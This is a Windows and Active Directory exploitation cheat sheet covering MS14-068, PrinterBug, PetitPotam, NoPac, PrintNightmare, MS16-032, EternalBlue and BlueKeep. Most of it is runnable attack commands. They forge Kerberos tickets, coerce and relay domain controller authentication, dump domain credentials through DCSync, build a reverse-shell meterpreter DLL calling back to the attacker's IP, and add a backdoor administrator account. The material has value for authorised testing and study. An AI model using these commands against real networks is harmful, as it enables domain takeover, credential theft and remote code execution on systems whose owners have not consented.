Windows

Index

Kerberos Checksum Vulnerability

This was a flaw in the Kerberos protocol, which could be leveraged along with standard domain user credentials to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation.The vulnerability allowed a forged PAC to be accepted by the KDC as legitimate. This can be leveraged to create a fake PAC, presenting a user as a member of the Domain Administrators or other privileged group. For more info see HERE.

Exploit to get TGT

# with a plaintext password
ms14-068.py -u '<BASICUSER>'@'<DOMAIN_FQDN>' -p '<PASSWORD>' -s '<BASICUSER_SID>' -d '<DOMAIN_CONTROLLER>'

# with pass-the-hash
ms14-068.py -u '<BASICUSER>'@'<DOMAIN_FQDN>' --rc4 '<NThash>' -s '<BASICUSER_SID>' -d '<DOMAIN_CONTROLLER>'

Impacket-Exploit to open a privileged session using the obtained TGT and PsExec

goldenPac.py <DOMAIN_FQDN>/<USER>:<PASS>@<DC_FQDN> -dc-ip <DC_IP>

Metasploit

admin/kerberos/ms14_068_kerberos_checksum

PrinterBug or SpoolSample

The Printer Bug is a flaw in the MS-RPRN protocol (Print System Remote Protocol). This protocol defines the communication of print job processing and print system management between a client and a print server. To leverage this flaw, any domain user can connect to the spool's named pipe with the RpcOpenPrinter method and use the RpcRemoteFindFirstPrinterChangeNotificationEx method, and force the server to authenticate to any host provided by the client over SMB. The spooler service runs as SYSTEM and is installed by default in Windows servers running Desktop Experience.

Set responder

sudo responder -I <INTERFACE>

Using PowerShell, get a list of Windows boxes (servers are usually priority)

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

With rpcdump.py see if the Spooler Service is listening

rpcdump.py <DOMAIN>/<USER>:<PASS>@<SERVER.DOMAIN.COM> | grep MS-RPRN

Now, with dementor.py or printerbug.py, ask the service to authenticate against an arbitrary host

python dementor.py -d <DOMAIN> -u <USER> -p <PASS> <RESPONDER_IP> <TARGET>

printerbug.py '<DOMAIN>/<USER>:<PASS>'@<TARGET> <RESPONDER_IP>

With SpoolerScanner see if the Spooler Service is listening

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Get-SpoolStatus -ComputerName <SERVER.DOMAIN.COM>

Now, with SpoolSample, ask the service to authenticate against an arbitrary host

SpoolSample.exe <TARGET> <RESPONDER_IP>

PetitPotam

The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS). For more info, see this link.

Use certi to attempt to locate the Web Enrollment URL for the CA host.

certi find -dc-ip <DC> -u <USER> -p <PASS> -d <DOMAIN>

Start ntlmrelayx.py, specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template.

sudo ntlmrelayx.py -debug -smb2support --target <URL>/certfnsh.asp --adcs --template DomainController

Attempt to coerce the Domain Controller to authenticate to our ntlmrelayx

Use PetitPotam.py

python3 PetitPotam.py <MyIP> <DC>

python3 PetitPotam.py [-d <DOMAIN> -u <USER> -p <PASS>] <MyIP> <DC>

Or, if initial access has been established to a domain joined system, use PetitPotam.exe

PetitPotam.exe <MyIP> <DC>

Use EFS module in Mimikatz.

misc::efs /server:<Domain Controller> /connect:<ATTACK HOST>

Obtain the User and the Base64 encoded certificate for the Domain Controller from ntlmrelayx.

Use gettgtpkinit.py to request a TGT for the domain controller.

python3 gettgtpkinit.py <DOMAIN>/<USER>\$ -pfx-base64 <BASE64> <OUT_NAME>.ccache
# take note of KEY

Set the KRB5CCNAME environment variable, so our attack host uses this file for Kerberos authentication attempts

export KRB5CCNAME=<OUT_NAME>.ccache

From krb5-user get TGT info with klist command (default principal)

Now we can use the TGT to perform various attack

Then use impacket-secretsdump to perform DCSync

secretsdump.py -just-dc-user <DOMAIN>/administrator -k -no-pass <DC_NAME/IP>

Then use getnthash.py from PKINITtools to request the NT hash

python /opt/PKINITtools/getnthash.py -key <KEY> <DOMAIN>/<DC_NAME/IP>

Alternatively, once we obtain the base64 certificate via ntlmrelayx, we could use the certificate with the Rubeus tool on a Windows attack host to request a TGT ticket and perform a pass-the-ticket (PTT) attack all at once.

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:<BASE64> /ptt

SamAccountName Spoofing - NoPac

CVE-2021-42278 is a bypass vulnerability with the Security Account Manager (SAM). CVE-2021-42287 is a vulnerability within the Kerberos Privilege Attribute Certificate (PAC) in ADDS.

This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller. By default, authenticated users can add up to 10 computers to a domain. When doing so, we change the name of the new host to match a Domain Controller's SamAccountName. Once done, we must request Kerberos tickets causing the service to issue us tickets under the DC's name instead of the new name. When a TGS is requested, it will issue the ticket with the closest matching name. Once done, we will have access as that service and can even be provided with a SYSTEM shell on a Domain Controller.

Install impacket

git clone https://github.com/SecureAuthCorp/impacket.git
python setup.py install

Use NoPac

Check if the system is vulnerable

sudo python3 scanner.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC> -use-ldap
# ms-DS-MachineAccountQuota > 0

Attack the target. (This could be "noisy" or may be blocked by AV or EDR)

Impersonate the built-in administrator account and drop into a semi-interactive shell session (smbexec.py) on the target Domain Controller.

sudo python3 noPac.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC> -dc-host <PN_NAME> -shell --impersonate administrator -use-ldap
# NoPac.py does save the TGT in the current directory

We could then use the TGT ccache file to perform a Pass-The-Ticket and perform further attacks such as DCSync. We can also use the tool with the -dump flag to perform a DCSync using secretsdump.py.

sudo python3 noPac.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC> -dc-host <PN_NAME> --impersonate administrator -use-ldap -dump -just-dc-user <DOMAIN>/administrator

PrintNightmare

Exploit-1 that execute a malicious DLL.

Install cube0x0's Version of Impacket

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

We can use rpcdump.py to see if "Print System Asynchronous Protocol" and "Print System Remote Protocol" are exposed on the target.

rpcdump.py @<IP> | egrep 'MS-RPRN|MS-PAR'

After confirming this, we can crafting a DLL payload using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=<MyPort> -f dll > backupscript.dll

We will then host this payload in an SMB share

sudo smbserver.py -smb2support <NAME_SHARE> /path/to/backupscript.dll

Now we can use MSF to configure & start a multi handler.

With the share hosting our payload and our multi handler listening for a connection, we can attempt to run the exploit against the target.

sudo python3 CVE-2021-1675.py <DOMAIN>/<USER>:<PASS>@<TARGET_IP> '\\<MY_IP>\<NAME_SHARE>\backupscript.dll'

Exploit-2 in powershell implementation.

Check if the Spooler service is running

ls \\localhost\pipe\spoolss

Exploit

Import-Module .\CVE-2021-1675.ps1 
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

Windows Kernel Elevation of Privilege Vulnerability

Exploit: Privilege Escalation with UsoDllLoader or diaghub, or with service that runs in the context of SYSTEM and is startable by unprivileged users.

ex: <PATH> = C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Check permission with icacls <PATH> Get 2 malicious.exe and renames with the name of the service exe.

Run exploit

.\CVE-2020-0668.exe <MaliciousExe1> <PATH>

Check permission with icacls <PATH> (all F)

Since MaliciousExe1 is no longer a valid, exchange it with the second

copy /Y <MaliciousExe2> <PATH>

Now run the malicious file as system

net start <SERVICE.exe>

Windows Certificate Dialog Elevation of Privilege Vulnerability

Use hhupd.exe that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.

Right Click on hhupd.exe > Run as administrator> Show information about the publisher's certificate > General > Link on "Issued by" and close

Now we have a browser open as system.

Right Click on browser > Save as > c:\windows\system32\cmd.exe in the path

Secondary Logon Elevation of Privilege Vulnerability

Exploit

Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

EternalBlue

SMB v1 vulnerability, Exploit

python3 .\42315.py

BlueKeep

RDP vulnerability, Exploit

nc -v -l 4444
python3 exploit.py <TARGET> -rp <PORT_RDP_SERVER> <MY_IP>

Last updated 5 months ago

Was this helpful?